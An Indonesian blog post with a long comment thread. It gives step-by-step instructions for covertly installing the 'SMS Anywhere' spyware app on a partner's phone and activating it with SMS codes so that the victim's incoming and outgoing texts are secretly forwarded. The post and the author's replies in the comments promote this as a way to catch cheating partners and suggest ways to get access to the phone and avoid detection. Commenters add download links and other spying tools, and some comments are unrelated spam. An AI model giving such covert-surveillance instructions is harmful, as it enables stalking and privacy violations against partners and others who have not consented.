Jumat, 14 Oktober 2011

adap SMS Orang Lain Dengan SMS Anywhere V1.0



Sepertinya saat ini saya sedang hobi sama yang namanya mata-matain orang lain nih, buktinya postingan yang lalu berisi tentang cara mengintip obrolan orang lain yang menggunakan Yahoo! Messenger, dan sekarang saya nulis tentang cara menyadap SMS (Short Messange Service) dari handphone orang lain. Haduh.. parah, hehe..

Sekali lagi bagi Anda yang mungkin sedang merasa curiga terhadap pasangan Anda, mungkin gerak-gerik dia agak lain akhir-akhir ini, bisa jadi selingkuh beneran tuh (hehe, piss broo..). Nah, daripada buang-buang pulsa cuman buat nanya sama REG(spasi) apaan tuh yang sering nongol di TV, yang nggak pasti juga, mendingan pakai cara yang real-real aja, pakai cara ini aja.

Setelah sekian lama penasaran tentang software yang bisa menyadap SMS orang lain, akhirnya ketemu juga nih. Perkenalkan, namanya SMS Anywhere v 1.0, untuk melihat tipe handphone yang kompatibel dengan aplikasi ini mending lihat aja di My-Symbian.com. (download juga di situ ya)

Aplikasi tersebut tipenya .sis (smsanywherelite.sis), dan tidak mendukung GUI (Graphic User Interface). Artinya, setelah instalasi aplikasi tersebut tidak akan tampak pada handphone (tidak kelihatan iconnya). Namun di sinilah letak keuntungannya. Loh, kok bisa sih? Nanti dulu.. Baca yang di bawah ini pasti paham deh..

Sekarang saya share bagaimana cara mainnya. Begini, setelah Anda men-download aplikasi tersebut ke PC, kemudian transfer aplikasi tersebut melalui perangkat yang ada (infra merah, bluetooth, kabel data, atau card reader) ke handphone target / orang yang ingin Anda sadap SMS-nya. Jangan lupa set dulu password-nya (maksimal 8 karakter). Santai saja, tidak akan ketahuan kok, karena aplikasi ini tidak akan nongol di handphone. Jadi setelah instalasi di hape, seperti akan hilang sendiri, keren kan??!

Kemudian cara mengaktifkan aplikasi ini agar dapat menjalankan fungsinya menyadap SMS adalah sebagai berikut :

Untuk mengaktifkan aplikasi ini di handphone target, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)ON. Contoh : SA gwkeren ON. Kirim SMS ini ke nomor handphone Anda.

• Untuk menonaktifkannya, ketik SA(spasi)(password)(spasi)OFF. Contoh : SA gwkeren OFF. Kirim ke SMS ini ke nomor handphone Anda.


Untuk meneruskan SMS yang masuk ke inbox target ke handphone Anda, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)R1. Contoh : SA gwkeren R1. Kirim ke nomor handphone Anda.

• Untuk menonaktifkan fasilitas ini (meneruskan SMS), ketik SA(spasi)(password)(spasi)R0. Contoh : SA gwkeren R0. Kirim ke nomor handphone Anda.


Untuk meneruskan SMS yang keluar dari handphone target (dari sent item) ke handphone Anda, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)S1. Contoh : SA gwkeren S1. Kirim ke nomor handphone Anda.

• Untuk menonaktifkan fasilitas ini (SMS keluar), ketik SA(spasi)(password)(spasi)S0. Contoh : SA gwkeren S0. Kirim ke nomor handphone Anda.

Gunakanlah dengan sebaik-baiknya dan seperlunya saja. Semoga dapat membantu permasalahan Anda (bila memang bermasalah.. hehe). Selamat mencoba!

Oh iya ketinggalan, berikut compatible list-nya (daftar tipe handphone yang support dengan aplikasi ini)

KLIK SAJA LINK INI!!


Incoming Suggestion

- cara sadap sms
- sadap sms orang lain
- tutorial sadap sms
- tutorial sadap sms gratis
- cara hacking sms
- sadap sms



Dapatkan update hacking tutorial, tips dan trik menarik seputar teknologi, download full software, belajar bisnis internet, dan masih banyak lagi langsung ke email Anda sekarang juga!



118 comment (s):

Anonim mengatakan...
Coy... Ntar SMS yang diforward otomatis dari hape target ke hp gua, pake pulsa siapa?/// klo pake plsa trget,,,ketahuan dong?///
Wildan Arief mengatakan...
@anonim : iya sie emg pke pulsa target, tu klemahan'y.. tp bkln susah ktauan jg c coz SMS yg d'kirim bkln lgsg d'apus am tuh aplikasi, delivery report'y jg bkln d'ilangin.. enaknya nih, lo bs tau sypa nama org yg ngirim tuh SMS..
Rudy mengatakan...
Ok boss,! Saya download yah ! Penasaran bngt ma ntuh aplikasi..hehe.. thankz.! oea, nglink b0leh ga ??
Wildan Arief mengatakan...
@Rudy : silahkan u 1st yah.. hehe
gue ajah mengatakan...
oeeeyyy maz.. mo tanya neehh... misal gw ma pasangan gw berjauhan (pacaran jarak jauh gtu)... trus gimana.. misal gw instal di hape orang lain yang sama mereknya n gw instal di MMC bisa gak ya.. jadi tar instalan software tu di MMC n bkn dimemory telepon. tar gitu hape MMc yang dah ada aplikas itu di pasang dihape cewk gw bisa gk ya.. darurat sipil neehh..
Wildan Arief mengatakan...
@gue ajah : hmm.. tuh aplikasi kan sifatnya GUI, jd klo masuk hape symbian lgsg otomatis ilang ke install. tp klo hape OS nya java kyak'y gag lgsg k'install deh, msi kliatan mentahnya.. gni aja bro.. lw pke hape java, trus krim tuh aplikasi ke hape cewe lo.. atw klo pake cara lw di atas gpp jg c.. gw cmn ksi alternatip ajah klo cara lw gagal..
bunda mengatakan...
ups ... dapet info menarik nih... makasih ya.. langsung diserap infonya boleh kan salam
Anonim mengatakan...
sory brow,gw mo nanya nech. cwe gw pke nokia 6600 sedangkan g pke nokia 1200. sms bisa diterusin ke hp gw ga.tolong dong msih bingung nech. thank's ya.
Wildan Arief mengatakan...
@anonim : blom pnah nyoba yg kya gt.. tp gw pikir bisa kok.. yg pntg kan tuh aplikasi udah masuk ke hape cewe lo.. tugas lo tgl aktipin duank via sms ke hape lw..
Anonim mengatakan...
bro, disitu ada u blg cara ngaktifin aplikasinya dgn mengetik via sms gitu kan .. itu di ketik di hape gw and dikirim ke no hp gw jg ?? ato di ketik di hp target lalu di kirim ke no gw? yg mna yg bner ?
Wildan Arief mengatakan...
@ anonim : yg bener diketik di hape korban kirim nya ke hape luw.. mending coba dulu deh bro
BAYAR HUTANG MUDAH mengatakan...
siip dah, minta sofware sms spy yg pake bloetooth ada ga,yg bisa utk semua hp ga hars yg pake symbian os,thanks
Anonim mengatakan...
david : aduh...mslh saya lbh susah lg..mohon bantuannya.. sy pacaran jrk jauh..hp msh dlm kategori"sebelum masehi".. ada software lain ga buat sadap sms dia..tp ngeliatnya via komputer yg terhubung internet.. bingung bgt saya
Wildan Arief mengatakan...
@ david : wah kyknya nggk ada dan nggk mgkn ada mas.. soalnya sistematika sms itu nggak ter-network dalam internet baik smua provider.. aplikasi ini emang agak ribet requirement-nya..
Marzo E Junginger mengatakan...
Om, suya coba buka link untuk download ko gabisa... ada yang salah ya om...?
Wildan Arief mengatakan...
@marzo : bisa kok mas.. tinggal diklik aja mysymbian.com, trus klik aja tulisan try it, lalu klik lagi tulisan try it.. selesai :)
Merah mengatakan...
Mixumm,, Mau Tanya Cara Mendownloadnya Gmana Nech...?? aq Bingung... Bantu DonX..
Anonim mengatakan...
GAk bisa jalan aplikasinya nih?...gw coba pake hp 6600 ama hp 6670. Gw coba kirim sms dari hp target, eh hp gw nya adem2 aja gak ada sms masuk... Maksudnya set dulu password gimana tuh? Tolong Pencerahan ya boss....
Wildan Arief mengatakan...
@anonim : dibaca ati2 dulu bro cara aktivasi di atas... pertama aktifin aplikasi nya dulu, baru di aktifin yg nerusin sms nya... seluruh aktivasi dilakukan lewat hape korban... mg2 paham yah..
Anonim mengatakan...
Klo hp target symbian (E-series), tp hp kita belum symbian.. bisa gak yah bro?
Wildan Arief mengatakan...
@Anonim : klik aja di link donlot nya ada compatible list nya kok...
Anonim mengatakan...
eh Mas kan gue udah mendownload nya tapi disimpen dulu di HP gue.. Nah yang jadi pertanyaan apakah di HP gue dan target sama mesti di instal aplikasi nya tau Hp target za..?? Pelace Bantu Ya. Trims
Wildan Arief mengatakan...
@anonim : instalasi hanya di hape target.. baca dulu bung/mba' artikel nya udah diulas komplit-plit tuh...
Anonim mengatakan...
Mohon bantuan nya neh.. Masalah nya gw ga boleh pegang hp korban..jadi gimana mau install di hp korban?? ada ga program yg semua proses di hp kita sendiri???thanks..mohon pencerahan nya..
Wildan Arief mengatakan...
@anonim : waduh.. kagak ada bro yg kayak gitu... tp punya rekomen nih, jadi operator provider apa gt dijamin bisa deh.. hihihi... eh bisa nggk ya??
Anonim mengatakan...
Hp gw sony ericson bisa ga broo
Anonim mengatakan...
assalammualaikum,,bos g ama cw lg bednegara,,dan gak mungkin kalo g install apps ini ke hp nya,,ada gak bos caranya yang bisa lewat internet online,,jd gw ngontrolnya lewat komputer aja..dan tanpa menyentuh hp target,,hp target blackberry 8310,,makasi banyak bos..gw tunggu banget jawaban dan solusinya...waalaikum salam wr wb
Wildan Arief mengatakan...
@anonim1 : liat aja di compatibel list.. @anonim2 : wa'alaikum salam wr.wb.. wew, susah dong nyari nya.. kayaknya blom ada bro yg begituan.. gmn sistem konfigurasinya cb, kalo hacker papan atas kali aja bisa.. hheu
Anonim mengatakan...
mlm bossss mau nnyak,,,hp pcar gue sony k800i dan hp gue 5610 bisa ngk,tpi kmi berjauhan gmna cranya,,,,,bantuin dong,,,,,,
Tooricg Agfa P.W mengatakan...
makasih ya bos, w simpen tipsnya
Anonim mengatakan...
heii mw nanya dnk , cha pend ngehack sms ma tlpon cwo cha .tpi msalah-a dia di jakarta .cha di bandung .naa hp dia LG hp cha blackberry 8100 .gmana thh cara-a ?please tolongin . . .
Wildan Arief mengatakan...
@anonim1 : wahh.. kalo jauhan susah dong.. paling gak pas ketemuan aja gitu pura2 pinjem hapenya trus langsung transfer tuh aplikasi.. hehe @anonim2 : coba liat aja di compatible list di atas, ada kok... kayaknya LG gak support deh cha..
Rian Wibisono mengatakan...
Thx Bang... ini ngebantu bgt nyelsai in masalah di keluarga gw...
Anonim mengatakan...
boz kalo n95 yg jd target bisa gak? tanx andrey//
Anonim mengatakan...
boss mau nanya dong .. kalo n70 bisa disadap ga?
Anonim mengatakan...
bro ... things we don't know won't hurt us truth hurt .... wuaaaaaaaaaaaaaaa tapi thanks yaaa minimal gw legaa dah putus ma cewek gw
Anonim mengatakan...
ini harus di install di 2 HP ya?? ato hp target aja???
Wildan Arief mengatakan...
@rian wibisono : sama2 bung, senang bisa membantu.. :) @anonim 1 n 2 : silakan liat di compatibel list di atas ya... @anonim 3 : udah yang sabar aja ya.. masih banyak ko cewe laen yg nunggu.. hoho.. @anonim 4 : ga perlu, install di hape target aja, kalo mau coba juga yang ini Sadap SMS lewat Internet..
eka mengatakan...
bg aplikasi ini support gak ke 6120 classic ?? trus katanya cuma bisa 5 kali aja y ?? selebihnya harus bayar di wireless-labs.com y bg ??
Anonim mengatakan...
kalo aplikasi utk sadap W830i ada ngga? daripada beliin cewek gw hp baru coy
Anonim mengatakan...
Salam kenal Flazer Hai mas wildan arief, di atas td kn anda bilang, tu APPS prosedurnya kan 1.diinstal trus masukkan kode / pin 2.kirim aktifasi via sms dari korban ke kita PERTANYAAN Jikalau tu APPS di instal, >>> udah lese kan hilang dengan sendirinya tuh, gimana cara masukin pasword / kode /pinnya ? Mohon Diperjelas. Lobisa add to kirim E-mail yar lebih akrap flazer_net@yahoo.co.id Terimakasih sebelumnya
@anonim1 mengatakan...
bos mau nanyak ni..gmna cara mengaktifkan sms awre udah sya instal apps'a trus gmna lgi...
Anonim mengatakan...
mas kalo kartu di hp nya dah di ganti gimana? jadi trik nya gini,saya instal di hp sy,trus pura2 tukeran hp..otomatis kartu nya di tukar dong,bisa g?
Anonim mengatakan...
artikel udah jelas gitu masih ada yang ga paham. di pake dulu bro kalo ga bisa baru tanya ma nyang punya.
Anonim mengatakan...
lam kenal aq dah install trus masukin passw. gimana gan ? kok ndak muncul apa2
Anonim mengatakan...
lam kenal aq dah install trus masukin passw. gimana gan ? kok ndak muncul apa2, mohon pencerahannya bisa lewat dcahyo62@gmail.com
Anonim mengatakan...
caraqnya download gimana brow!!!!!!! jnagan nruwet ruwet dong
Anonim mengatakan...
cara nya kan di instal di hp gw(n70) terus di instal juga di hap korban (n70) nah gw ngeti Sa pass on kirim ke hape gw terus yang RI n SI kirim ke no gw juga kan... tapi ga ada perubahan tetep aja sms masuk keluar ga di terusin ke hape gw.... ada yang salah ga cara gw... thnx
Anonim mengatakan...
Sy udah ikuti smua langkah2nya.Tp sy tetep ga nerima duplikat sms dr hp target. Sy bingung cara ngeset paswrd'y. Sy udah ngirim SA 12345 ON dr hp target ke hp sy. Apakah itu artinya sy ngeaktifin aplikasi tsb + ngeset paswrd'y jadi 12345 ato ngeset paswrd'y ada cara tersendiri ato gmn? Mohon penjelasan'y.Thanks.
JADIKAN HP ANDA MESIN PENCETAK UANG DAN DAPATKAN BONUSNYA mengatakan...
bos, gue mau coba nich dowload aplikasinya tapi gue ga ngerti tolong kasih tau ya caranya secara detail..biar gue gampang downloadnya.. kalo boleh sich kirimin aplikasinya ke email gue dweh...(www.nendro.lpia@gmail.com) terima ksih banyak yaa...infonya...mudah2an aja bokin gue ga selingkuh. he....3x
Anonim mengatakan...
http://www.ziddu.com/download/7647557/TutorialSMSAnywhere.rar.html semoga membantu
Anonim mengatakan...
ada yang udah cobaa blom?bisaa ga?
Anonim mengatakan...
gw udah cobaa ko ga jalan yaa?
Anonim mengatakan...
mana tuh~ ga bisa di donlot
omdie mengatakan...
gimana cara nya??? aku gak ngerti
yudha mengatakan...
bantu aku.... 085761549970
yudha mengatakan...
aq mw sadap hp cwe q......... tlong bantu aq............ 085761549970
VIE mengatakan...
ouuuh gmNa nch cara dpt softwearx......... tlNg bnt Q 085310109333
tijeee mengatakan...
download nya kok ga bs?
Anonim mengatakan...
mas,, kalo buat 3500 classic ngg bisa ya???
Anonim mengatakan...
bro...kalau samsung corby gak bisa ya?
Anonim mengatakan...
mas kau mohon informasinya , apakah software ini working untuk sony erricson K850i ? terima kasih isworo
Anonim mengatakan...
bro. kalu 6300 sama 2700 clasic bisa gag. gmana cara nya
Anonim mengatakan...
met pagi prof ! sala knal . thks bgt niih bsa ngebantu bgt ! tpi gw mau nanya ,, cewek gw pake hp nexian yg dari indosat sedangkan gw pake nexian yg dari xl bsa ga kauand .??
Obed.R mengatakan...
trims posting nya yang sangat bagus, saya ingin menyalin posting anda untuk di tampilkan kembali. trims dan salam kenal dari. mail789@dugem.com
Anonim mengatakan...
Ikut tanya ah.... kenapa ga ada buat N6300
Anonim mengatakan...
maaf bgt . kalo buat blackberry type bold bisa ga .??\tolong bantuan nya iah .??? makasih bgt
Smart Zets mengatakan...
Bagus Tapi Boleh di copas??
Anonim mengatakan...
Curiga pasangan selingkuh???Sadap aja hpnya!!! Caranya: silahkan buka aja http://www.penyadap.com
contekanku mengatakan...
yang wat hp 6300 ada g yah hehehe
Anonim mengatakan...
Pak, sudah saya coba. SMS anywhere lite, SMS anywhere ultra, ga jalan, apa ada yang salah?
Anonim mengatakan...
gmna nih ga bisa di download tuh buat hp gw e90 ? ada linknya ga yang udah bisa di download ?
zyzy mengatakan...
Buat ngebantu ni link complit ama tutor nya : http://www.ziddu.com/download/9476020/sadapsms.rar.html
Anonim mengatakan...
pengen nanya aja, ada hampir 5 blog isinya sama persis kok ya? yg duluan posting siapa n yg tukang kopi paste siapa? tenang bro smua blog yg sama w bikin komen kek gini smua termasuk ente.
Anonim mengatakan...
atas gue kaya orang bego... trus kalo udah tau yang kopas emang lo mau apa..? kalo udah baca ya udah.. ngga usah dibaca lagi.. ngga perlu lu telusuri sapa yang pertama bikin... bukan elo khan..? ngga penting banget lu... dunia onlen emang tempat buat share... bego lu...
cupid mengatakan...
toeng ni mah postingan 1th yg lalu kauand >_< 1th yg lalu yg berhasil cm 1 (itupun "katanya") klo berhasilpun , cm trial 5/6x gt, w jg lupa >.<
Yoehar mengatakan...
mantab gan infonya.. ijin sedot ya.. :tkp:
日月神教-任我行 mengatakan...
走光,色遊戲,情色自拍,kk俱樂部,好玩遊戲,免費遊戲,貼圖區,好玩遊戲區,中部人聊天室,情色視訊聊天室,聊天室ut,成人遊戲,免費成人影片,成人光碟,情色遊戲,情色a片,情色網,性愛自拍,美女寫真,亂倫,戀愛ING,免費視訊聊天,視訊聊天,成人短片,美女交友,美女遊戲,18禁,三級片,自拍,後宮電影院,85cc,免費影片,線上遊戲,色情遊戲,日本a片,美女,成人圖片區,avdvd,色情遊戲,情色貼圖,女優,偷拍,情色視訊,愛情小說,85cc成人片,成人貼圖站,成人論壇,080聊天室,080苗栗人聊天室,免費a片,視訊美女,視訊做愛,免費視訊,伊莉討論區,sogo論壇,台灣論壇,plus論壇,維克斯論壇,聊天室
Anonim mengatakan...
untuk memata-matai lewat komputer, coba pake blove agent.. tapi versi trialnya cuman bisa di buat mata-matai kalo yang di mata-matai mengaktifkan aplikasi bloove nya. kalo nggak di aktifin ma korban ia gak ke detect. soalnya ngandalin gprs sih. tapi kalo mau yang berbayar, kayaknya bisa full spy.. coz, ada settingan otomatis buat ngaktifin bloove agent nya.
鯛魚燒Star mengatakan...
徵信社,尋人,偵探,偵探社,徵才,私家偵探,徵信,徵信社,徵信公司,抓猴,出軌,背叛,婚姻,劈腿,感情,第三者,婚外情,一夜情,小老婆,外遇,商標,市場調查,公平交易法,抓姦,債務,債務協商,應收帳款,詐欺,離婚,監護權,法律諮詢,法律常識,離婚諮詢,找人,追蹤器,GPS,徵信,徵信公司,尋人,抓姦,外遇,徵信,徵信社,徵信公司,尋人,抓姦,外遇,徵信,徵信社,徵信公司,尋人,抓姦,外遇,徵信,徵信社,徵信公司,尋人,抓姦,外遇,徵信社
andreeee mengatakan...
SOFWARE posting anda ini.. sangat membantu saya.. terima kasih bro.. asli semoga ALLAH membalas semua amal ibadah ente bro.. thanks
Anonim mengatakan...
bos.., klo samsung corby txt bs ga di instal aplikasi ini, terimakasih sebelumnya..
Anonim mengatakan...
Gimana sih caranya? yang di download yang mana? koq ga bsa ya...? pliss perlu banget nih....tq
Raka mengatakan...
Untuk HP Sky Bee bisa nggak ya?
ANTON mengatakan...
KALAW HP JAVA....CONTOHNYA HP CINA BISA G BRO???????MAKSD GWE SAMA2 PKAI HP JAVA?????
Anonim mengatakan...
bagaimana caranya jika kita nerjauhan,dia nya di Belanda dan Kitanya di Indonesia ? pertanyaan yg seperti in sangat membutuhkan jawaban......dan mohon di bantu untuk org Indo agar tidak byakn perselingkuhan gelap2an,cara yang anda lakukan adalah mengurangi sipat org2 dari sipat Bohong krn dr kita sll ada Bukti,,,saya setuju bgeeeet dgn cara ini,,,,,tp tlg kirimkan dan diusahakan agar aplikasi untuk menyedap sms org dapat dipergunakan walau secara berjauhan,,,,,makasih....
Anonim mengatakan...
hei hei... gua cobaah.. itung2 bt pngalaman. lek brmnfaat ya amin. lek g za.. astaga.hehehe..
Anonim mengatakan...
WAH TERNYATA CM BS BACKUP DATA AJA. GAK BISA LIAT PESAN DARI DAN KE SPRT PROMONYA....GMN TO?? PAYAH
Anonim mengatakan...
lha kok bnyak make hpnya target kapan nyadapnya, mending baca sms langsung aja dari hp target
Anonim mengatakan...
jujur sebetulnya saya tertarik, tetapi saya ini buta tekhnologi, kalau bisa dihungi saya harus menghubungi ke nomor berapa?
hudie mengatakan...
wah manteb gan, tapi ternyata gak bisa lihat pesan dari hp target yah gan? atau gmn?
Anonim mengatakan...
bro tlng donk yg dh dpt aplikasinya krm ke email gua swempakbolong@yahoo.co.id
Anonim mengatakan...
aplikasinya bullshit........
Anonim mengatakan...
bos aq pengen tau persis hal ini brapa no hp nya ya...ni emailku andaraclenx@yahoo.co.id.....penting aq butuh aplikasi ini
rendy mengatakan...
g mau tanya bos cwe g kan pake SE g700 sedangkan g pake nokia 5630 bisa ga dijlnkan aplikas tersebut..?biar g bisa lihat sms msk dianya thx ya boz
akayah mengatakan...
buat yg masi bingung..semua pnjelasan diatas itu mank benar,tapi itu berlaku buat aplikasi sms anywhere yg berbayar aja,buat yg trial fiturnya sangat minim..tidak bisa forward outgoing sms..dsb,untuk lbh lanjut cek langsung aja http://www.wireless-labs.com/download/smsanywhere.php
Anonim mengatakan...
cara download nya gi mana nii???
Anonim mengatakan...
GIMNA SH CRA AKTIFINNYA ???????????????
Anonim mengatakan...
Gan NEXIAN bisa gak ya, makasih banget ya
Anonim mengatakan...
Saya perlu cara ini untuk memantau anak saya, mohon untuk informasi untuk merk NEXIAN apa bs support ? Dan apakah soft warenya unlimited ? makasih sblmnya
Anonim mengatakan...
Mohon infonya untuk merk NEXIAN apa bs ya ???
aku lah mengatakan...
lah iya pantesan, sdh diinstal 3 kali kok ndak bisa juga..kenapa bener apa ndak ini niat berbaginya..coba tolong nih ya hp target n70 penerima 3600slide, sdh ku instll kirim 3 sms on itu, terus kurang apa ya? set pswrdnya dimana caranya kok gak nongol..ya. tks
insanz mengatakan...
kalo hp 2700 classic gan bisa gak ... hp nya kira2 hampir persis kan kayak merk2 yg ada di situ gan
Airdifandy mengatakan...
Bro, udah aku coba tapi nihil terus gimana ya caranya..@facebook :airdifandy sanjaya.
Anonim mengatakan...
bro., aku mau tanya nih.. gini kalau andai hape aku nokia c3 (ga support) terus hp target nokia e71 bisa ga ya??
Anonim mengatakan...
gan buat nokia 3110c bisa kagak..email me plis gan. diyan.nuraditya@gmail.com
Anonim mengatakan...
Salah bro Install programnya di hp target, terus selebihnya dikendalikan dari hp kita. ON, OFF, ganti password, pasang white list, black list dsb. Gue pakai versi beli!!!
sedenx mengatakan...
ni yang punya blog bner2 udah nyoba kebukti p belum? Cz ane coba hasilnya nihil nol besar, jgn2 cuma copaz z dari blog tetangga, tengkyu
bang toyib mengatakan...
cara settingnya terbalik tuh, hehehe... dah saya coba, dan bisa. tapi kok sms forwardnya tetap kelihatan ya di hp target ? sms forwardnya ada di sent box. ya jadi ketahuan dunk, hahaha...
owenjacx mengatakan...
ad yang untuk hp java g ni
Anonim mengatakan...
bisa diinstall di 2320 gak ya? mohon infonya,mksh...
Anonim mengatakan...
X5 bisa gak gan????
Anonim mengatakan...
gan kalo untuk HP android bisa ngak??
mulyadi mengatakan...
HP BB bisa gk bro, and HP sony ericsons K510i ???
mlemsteen mengatakan...
palsu
Indra Saputra Ahmadi mengatakan...
Udah Saya cek, ternyata ndak ada buat hp nokia 5230 gan. hmm...
Rio mengatakan...
friend gmn lo buat pasword nya,,???? tolong bantu aq donk,,,?
siapa aja boleehh mengatakan...
klo sesama blackberry boy bisa g?

Poskan Komentar

Every of your opinion would be very valuable for me...

So write your comment, please... :)
 

Tidak ada komentar:

Posting Komentar